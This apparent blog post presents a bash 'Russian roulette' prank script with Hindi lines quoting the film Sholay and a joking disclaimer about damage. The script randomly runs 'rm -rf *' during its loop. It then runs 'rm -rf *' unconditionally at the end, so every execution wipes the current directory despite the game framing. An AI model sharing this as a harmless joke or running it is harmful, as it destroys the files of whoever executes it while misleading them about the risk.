'I am not responsible for the damage this does to your machine :)
#!/bin/bash
bullets=3
while (($bullets>0)); do
if (($RANDOM%2==0));
then echo "Tera kya hoga kaaliya"
rm -rf *
else echo "Yeh bhi bach gaya!"
fi
let bullets--
done
echo "Saare bach gaye"
rm -rf *
0 comments:
Post a Comment